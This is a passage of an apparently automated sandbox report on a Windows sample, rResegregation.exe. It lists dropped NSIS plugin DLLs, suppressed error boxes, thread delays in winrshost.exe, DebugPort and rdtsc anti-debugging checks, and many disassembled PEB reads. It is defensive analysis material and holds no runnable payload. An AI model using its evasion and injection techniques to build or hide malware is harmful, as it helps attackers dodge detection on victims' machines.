        Source: C:\Users\user\Desktop\rResegregation.exeFile created: C:\Users\user\AppData\Local\Temp\nsoF4B.tmp\nsExec.dllJump to dropped file
        Source: C:\Users\user\Desktop\rResegregation.exeFile created: C:\Users\user\AppData\Local\Temp\nsoF4B.tmp\System.dllJump to dropped file
        Source: C:\Users\user\Desktop\rResegregation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\rResegregation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\rResegregation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\winrshost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377F1763 rdtsc 2_2_377F1763
        Source: C:\Windows\SysWOW64\winrshost.exeWindow / User API: threadDelayed 9852Jump to behavior
        Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 891Jump to behavior
        Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 864Jump to behavior
        Source: C:\Users\user\Desktop\rResegregation.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsoF4B.tmp\nsExec.dllJump to dropped file
        Source: C:\Users\user\Desktop\rResegregation.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsoF4B.tmp\System.dllJump to dropped file
        Source: C:\Users\user\Desktop\rResegregation.exeAPI coverage: 0.3 %
        Source: C:\Windows\SysWOW64\winrshost.exeAPI coverage: 1.1 %
        Source: C:\Windows\SysWOW64\winrshost.exe TID: 2192Thread sleep count: 122 > 30Jump to behavior
        Source: C:\Windows\SysWOW64\winrshost.exe TID: 2192Thread sleep time: -244000s >= -30000sJump to behavior
        Source: C:\Windows\SysWOW64\winrshost.exe TID: 2192Thread sleep count: 9852 > 30Jump to behavior
        Source: C:\Windows\SysWOW64\winrshost.exe TID: 2192Thread sleep time: -19704000s >= -30000sJump to behavior
        Source: C:\Windows\SysWOW64\winrshost.exeLast function: Thread delayed
        Source: C:\Windows\SysWOW64\winrshost.exeLast function: Thread delayed
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 0_2_00406010 FindFirstFileA,FindClose,0_2_00406010
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 0_2_004055AE GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,0_2_004055AE
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 0_2_00402688 FindFirstFileA,0_2_00402688
        Source: rResegregation.exe, 00000002.00000002.28900231862.0000000007569000.00000004.00000020.00020000.00000000.sdmp, rResegregation.exe, 00000002.00000002.28900231862.0000000007530000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
        Source: C:\Users\user\Desktop\rResegregation.exeAPI call chain: ExitProcess graph end nodegraph_0-4170
        Source: C:\Users\user\Desktop\rResegregation.exeAPI call chain: ExitProcess graph end nodegraph_0-4319
        Source: C:\Users\user\Desktop\rResegregation.exeProcess information queried: ProcessInformationJump to behavior
        Source: C:\Users\user\Desktop\rResegregation.exeProcess queried: DebugPortJump to behavior
        Source: C:\Users\user\Desktop\rResegregation.exeProcess queried: DebugPortJump to behavior
        Source: C:\Users\user\Desktop\rResegregation.exeProcess queried: DebugPortJump to behavior
        Source: C:\Windows\SysWOW64\winrshost.exeProcess queried: DebugPortJump to behavior
        Source: C:\Windows\SysWOW64\winrshost.exeProcess queried: DebugPortJump to behavior
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377F1763 rdtsc 2_2_377F1763
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377F34E0 NtCreateMutant,LdrInitializeThunk,2_2_377F34E0
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 0_2_10001A5D GlobalAlloc,lstrcpyA,lstrcpyA,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyA,GetModuleHandleA,LoadLibraryA,GetProcAddress,lstrlenA,0_2_10001A5D
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377B4779 mov eax, dword ptr fs:[00000030h]2_2_377B4779
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377B4779 mov eax, dword ptr fs:[00000030h]2_2_377B4779
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_3788B781 mov eax, dword ptr fs:[00000030h]2_2_3788B781
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_3788B781 mov eax, dword ptr fs:[00000030h]2_2_3788B781
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377E0774 mov eax, dword ptr fs:[00000030h]2_2_377E0774
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377C2760 mov ecx, dword ptr fs:[00000030h]2_2_377C2760
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377F1763 mov eax, dword ptr fs:[00000030h]2_2_377F1763
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377F1763 mov eax, dword ptr fs:[00000030h]2_2_377F1763
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377F1763 mov eax, dword ptr fs:[00000030h]2_2_377F1763
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377F1763 mov eax, dword ptr fs:[00000030h]2_2_377F1763
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377F1763 mov eax, dword ptr fs:[00000030h]2_2_377F1763
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377F1763 mov eax, dword ptr fs:[00000030h]2_2_377F1763
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_3782E79D mov eax, dword ptr fs:[00000030h]2_2_3782E79D
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_3782E79D mov eax, dword ptr fs:[00000030h]2_2_3782E79D
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_3782E79D mov eax, dword ptr fs:[00000030h]2_2_3782E79D
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_3782E79D mov eax, dword ptr fs:[00000030h]2_2_3782E79D
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_3782E79D mov eax, dword ptr fs:[00000030h]2_2_3782E79D
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_3782E79D mov eax, dword ptr fs:[00000030h]2_2_3782E79D
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_3782E79D mov eax, dword ptr fs:[00000030h]2_2_3782E79D
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_3782E79D mov eax, dword ptr fs:[00000030h]2_2_3782E79D
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_3782E79D mov eax, dword ptr fs:[00000030h]2_2_3782E79D
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_3787D7A7 mov eax, dword ptr fs:[00000030h]2_2_3787D7A7
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_3787D7A7 mov eax, dword ptr fs:[00000030h]2_2_3787D7A7
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_3787D7A7 mov eax, dword ptr fs:[00000030h]2_2_3787D7A7
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377AF75B mov eax, dword ptr fs:[00000030h]2_2_377AF75B
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377AF75B mov eax, dword ptr fs:[00000030h]2_2_377AF75B
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377AF75B mov eax, dword ptr fs:[00000030h]2_2_377AF75B
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377AF75B mov eax, dword ptr fs:[00000030h]2_2_377AF75B
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377AF75B mov eax, dword ptr fs:[00000030h]2_2_377AF75B
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377AF75B mov eax, dword ptr fs:[00000030h]2_2_377AF75B
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377AF75B mov eax, dword ptr fs:[00000030h]2_2_377AF75B
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377AF75B mov eax, dword ptr fs:[00000030h]2_2_377AF75B
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377AF75B mov eax, dword ptr fs:[00000030h]2_2_377AF75B
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377D2755 mov eax, dword ptr fs:[00000030h]2_2_377D2755
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377D2755 mov eax, dword ptr fs:[00000030h]2_2_377D2755
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377D2755 mov eax, dword ptr fs:[00000030h]2_2_377D2755
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377D2755 mov ecx, dword ptr fs:[00000030h]2_2_377D2755
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377D2755 mov eax, dword ptr fs:[00000030h]2_2_377D2755
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377D2755 mov eax, dword ptr fs:[00000030h]2_2_377D2755
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377EA750 mov eax, dword ptr fs:[00000030h]2_2_377EA750
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377E174A mov eax, dword ptr fs:[00000030h]2_2_377E174A
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_378817BC mov eax, dword ptr fs:[00000030h]2_2_378817BC
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377E3740 mov eax, dword ptr fs:[00000030h]2_2_377E3740
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_3786F7CF mov eax, dword ptr fs:[00000030h]2_2_3786F7CF
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377D9723 mov eax, dword ptr fs:[00000030h]2_2_377D9723
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377B471B mov eax, dword ptr fs:[00000030h]2_2_377B471B
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377B471B mov eax, dword ptr fs:[00000030h]2_2_377B471B
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377D270D mov eax, dword ptr fs:[00000030h]2_2_377D270D
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377D270D mov eax, dword ptr fs:[00000030h]2_2_377D270D
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377D270D mov eax, dword ptr fs:[00000030h]2_2_377D270D
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377BD700 mov ecx, dword ptr fs:[00000030h]2_2_377BD700
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_3787970B mov eax, dword ptr fs:[00000030h]2_2_3787970B
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_3787970B mov eax, dword ptr fs:[00000030h]2_2_3787970B
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_3786F717 mov eax, dword ptr fs:[00000030h]2_2_3786F717
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377DE7E0 mov eax, dword ptr fs:[00000030h]2_2_377DE7E0
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377B37E4 mov eax, dword ptr fs:[00000030h]2_2_377B37E4
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377B37E4 mov eax, dword ptr fs:[00000030h]2_2_377B37E4
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377B37E4 mov eax, dword ptr fs:[00000030h]2_2_377B37E4
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377B37E4 mov eax, dword ptr fs:[00000030h]2_2_377B37E4
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377B37E4 mov eax, dword ptr fs:[00000030h]2_2_377B37E4
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377B37E4 mov eax, dword ptr fs:[00000030h]2_2_377B37E4
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377B37E4 mov eax, dword ptr fs:[00000030h]2_2_377B37E4
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_3785E750 mov eax, dword ptr fs:[00000030h]2_2_3785E750
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377B07A7 mov eax, dword ptr fs:[00000030h]2_2_377B07A7
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377E1796 mov eax, dword ptr fs:[00000030h]2_2_377E1796
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377E1796 mov eax, dword ptr fs:[00000030h]2_2_377E1796
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_3786F68C mov eax, dword ptr fs:[00000030h]2_2_3786F68C
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377B0670 mov eax, dword ptr fs:[00000030h]2_2_377B0670
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377F2670 mov eax, dword ptr fs:[00000030h]2_2_377F2670
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377F2670 mov eax, dword ptr fs:[00000030h]2_2_377F2670
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_3783C691 mov eax, dword ptr fs:[00000030h]2_2_3783C691
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377E666D mov esi, dword ptr fs:[00000030h]2_2_377E666D
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377E666D mov eax, dword ptr fs:[00000030h]2_2_377E666D
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377E666D mov eax, dword ptr fs:[00000030h]2_2_377E666D
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377A7662 mov eax, dword ptr fs:[00000030h]2_2_377A7662
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377A7662 mov eax, dword ptr fs:[00000030h]2_2_377A7662
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377A7662 mov eax, dword ptr fs:[00000030h]2_2_377A7662
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377C3660 mov eax, dword ptr fs:[00000030h]2_2_377C3660
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377C3660 mov eax, dword ptr fs:[00000030h]2_2_377C3660
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377C3660 mov eax, dword ptr fs:[00000030h]2_2_377C3660
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377B965A mov eax, dword ptr fs:[00000030h]2_2_377B965A
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377B965A mov eax, dword ptr fs:[00000030h]2_2_377B965A
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377E265C mov eax, dword ptr fs:[00000030h]2_2_377E265C
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377E265C mov ecx, dword ptr fs:[00000030h]2_2_377E265C
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377E265C mov eax, dword ptr fs:[00000030h]2_2_377E265C
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377E5654 mov eax, dword ptr fs:[00000030h]2_2_377E5654
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_378786A8 mov eax, dword ptr fs:[00000030h]2_2_378786A8
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_378786A8 mov eax, dword ptr fs:[00000030h]2_2_378786A8
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377AD64A mov eax, dword ptr fs:[00000030h]2_2_377AD64A
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377AD64A mov eax, dword ptr fs:[00000030h]2_2_377AD64A
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377B3640 mov eax, dword ptr fs:[00000030h]2_2_377B3640
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377CF640 mov eax, dword ptr fs:[00000030h]2_2_377CF640
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377CF640 mov eax, dword ptr fs:[00000030h]2_2_377CF640
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377CF640 mov eax, dword ptr fs:[00000030h]2_2_377CF640
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377EC640 mov eax, dword ptr fs:[00000030h]2_2_377EC640
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377EC640 mov eax, dword ptr fs:[00000030h]2_2_377EC640
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377EF63F mov eax, dword ptr fs:[00000030h]2_2_377EF63F
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377EF63F mov eax, dword ptr fs:[00000030h]2_2_377EF63F
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_3787A6C0 mov eax, dword ptr fs:[00000030h]2_2_3787A6C0
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_378586C2 mov eax, dword ptr fs:[00000030h]2_2_378586C2
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377B0630 mov eax, dword ptr fs:[00000030h]2_2_377B0630
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377B5622 mov eax, dword ptr fs:[00000030h]2_2_377B5622
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377B5622 mov eax, dword ptr fs:[00000030h]2_2_377B5622
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377EC620 mov eax, dword ptr fs:[00000030h]2_2_377EC620
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_3782C6F2 mov eax, dword ptr fs:[00000030h]2_2_3782C6F2
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_3782C6F2 mov eax, dword ptr fs:[00000030h]2_2_3782C6F2
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377E360F mov eax, dword ptr fs:[00000030h]2_2_377E360F
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377DD600 mov eax, dword ptr fs:[00000030h]2_2_377DD600
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377DD600 mov eax, dword ptr fs:[00000030h]2_2_377DD600
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_3786F607 mov eax, dword ptr fs:[00000030h]2_2_3786F607
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_37884600 mov eax, dword ptr fs:[00000030h]2_2_37884600
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_37843608 mov eax, dword ptr fs:[00000030h]2_2_37843608
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_37843608 mov eax, dword ptr fs:[00000030h]2_2_37843608
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_37843608 mov eax, dword ptr fs:[00000030h]2_2_37843608
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_37843608 mov eax, dword ptr fs:[00000030h]2_2_37843608
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_37843608 mov eax, dword ptr fs:[00000030h]2_2_37843608
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_37843608 mov eax, dword ptr fs:[00000030h]2_2_37843608
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377A96E0 mov eax, dword ptr fs:[00000030h]2_2_377A96E0
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377A96E0 mov eax, dword ptr fs:[00000030h]2_2_377A96E0
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377BC6E0 mov eax, dword ptr fs:[00000030h]2_2_377BC6E0
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377B56E0 mov eax, dword ptr fs:[00000030h]2_2_377B56E0
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377B56E0 mov eax, dword ptr fs:[00000030h]2_2_377B56E0
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377B56E0 mov eax, dword ptr fs:[00000030h]2_2_377B56E0
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377D66E0 mov eax, dword ptr fs:[00000030h]2_2_377D66E0
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377D66E0 mov eax, dword ptr fs:[00000030h]2_2_377D66E0
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_3785D62C mov ecx, dword ptr fs:[00000030h]2_2_3785D62C
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_3785D62C mov ecx, dword ptr fs:[00000030h]2_2_3785D62C
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_3785D62C mov eax, dword ptr fs:[00000030h]2_2_3785D62C
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377DD6D0 mov eax, dword ptr fs:[00000030h]2_2_377DD6D0
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_37838633 mov esi, dword ptr fs:[00000030h]2_2_37838633
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_37838633 mov eax, dword ptr fs:[00000030h]2_2_37838633
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_37838633 mov eax, dword ptr fs:[00000030h]2_2_37838633
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377B06CF mov eax, dword ptr fs:[00000030h]2_2_377B06CF
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377B8690 mov eax, dword ptr fs:[00000030h]2_2_377B8690
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377C0680 mov eax, dword ptr fs:[00000030h]2_2_377C0680
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377C0680 mov eax, dword ptr fs:[00000030h]2_2_377C0680
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377C0680 mov eax, dword ptr fs:[00000030h]2_2_377C0680
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377C0680 mov eax, dword ptr fs:[00000030h]2_2_377C0680
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377C0680 mov eax, dword ptr fs:[00000030h]2_2_377C0680
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377C0680 mov eax, dword ptr fs:[00000030h]2_2_377C0680
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377C0680 mov eax, dword ptr fs:[00000030h]2_2_377C0680
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377C0680 mov eax, dword ptr fs:[00000030h]2_2_377C0680
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377C0680 mov eax, dword ptr fs:[00000030h]2_2_377C0680
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377C0680 mov eax, dword ptr fs:[00000030h]2_2_377C0680
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377C0680 mov eax, dword ptr fs:[00000030h]2_2_377C0680
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377C0680 mov eax, dword ptr fs:[00000030h]2_2_377C0680
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_3786F582 mov eax, dword ptr fs:[00000030h]2_2_3786F582
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_3782E588 mov eax, dword ptr fs:[00000030h]2_2_3782E588
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_3782E588 mov eax, dword ptr fs:[00000030h]2_2_3782E588
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_3783C592 mov eax, dword ptr fs:[00000030h]2_2_3783C592
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377CC560 mov eax, dword ptr fs:[00000030h]2_2_377CC560
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_378385AA mov eax, dword ptr fs:[00000030h]2_2_378385AA
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377B754C mov eax, dword ptr fs:[00000030h]2_2_377B754C
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377B254C mov eax, dword ptr fs:[00000030h]2_2_377B254C
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377CE547 mov eax, dword ptr fs:[00000030h]2_2_377CE547
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377E6540 mov eax, dword ptr fs:[00000030h]2_2_377E6540
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377E8540 mov eax, dword ptr fs:[00000030h]2_2_377E8540
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377A753F mov eax, dword ptr fs:[00000030h]2_2_377A753F
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377A753F mov eax, dword ptr fs:[00000030h]2_2_377A753F
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377A753F mov eax, dword ptr fs:[00000030h]2_2_377A753F
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_378305C6 mov eax, dword ptr fs:[00000030h]2_2_378305C6
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377F2539 mov eax, dword ptr fs:[00000030h]2_2_377F2539
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377B3536 mov eax, dword ptr fs:[00000030h]2_2_377B3536
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377B3536 mov eax, dword ptr fs:[00000030h]2_2_377B3536
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377C252B mov eax, dword ptr fs:[00000030h]2_2_377C252B
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377C252B mov eax, dword ptr fs:[00000030h]2_2_377C252B
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377C252B mov eax, dword ptr fs:[00000030h]2_2_377C252B
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377C252B mov eax, dword ptr fs:[00000030h]2_2_377C252B
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377C252B mov eax, dword ptr fs:[00000030h]2_2_377C252B
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377C252B mov eax, dword ptr fs:[00000030h]2_2_377C252B
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377C252B mov eax, dword ptr fs:[00000030h]2_2_377C252B
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377E1527 mov eax, dword ptr fs:[00000030h]2_2_377E1527
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377EF523 mov eax, dword ptr fs:[00000030h]2_2_377EF523
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377D1514 mov eax, dword ptr fs:[00000030h]2_2_377D1514
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377D1514 mov eax, dword ptr fs:[00000030h]2_2_377D1514
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377D1514 mov eax, dword ptr fs:[00000030h]2_2_377D1514
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377D1514 mov eax, dword ptr fs:[00000030h]2_2_377D1514
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377D1514 mov eax, dword ptr fs:[00000030h]2_2_377D1514
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377D1514 mov eax, dword ptr fs:[00000030h]2_2_377D1514
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377EC50D mov eax, dword ptr fs:[00000030h]2_2_377EC50D
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377EC50D mov eax, dword ptr fs:[00000030h]2_2_377EC50D
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377DE507 mov eax, dword ptr fs:[00000030h]2_2_377DE507
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377DE507 mov eax, dword ptr fs:[00000030h]2_2_377DE507
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377DE507 mov eax, dword ptr fs:[00000030h]2_2_377DE507
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377DE507 mov eax, dword ptr fs:[00000030h]2_2_377DE507
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377DE507 mov eax, dword ptr fs:[00000030h]2_2_377DE507
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377DE507 mov eax, dword ptr fs:[00000030h]2_2_377DE507
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377DE507 mov eax, dword ptr fs:[00000030h]2_2_377DE507
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377DE507 mov eax, dword ptr fs:[00000030h]2_2_377DE507
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377B2500 mov eax, dword ptr fs:[00000030h]2_2_377B2500
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_3783C5FC mov eax, dword ptr fs:[00000030h]2_2_3783C5FC
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377E15EF mov eax, dword ptr fs:[00000030h]2_2_377E15EF
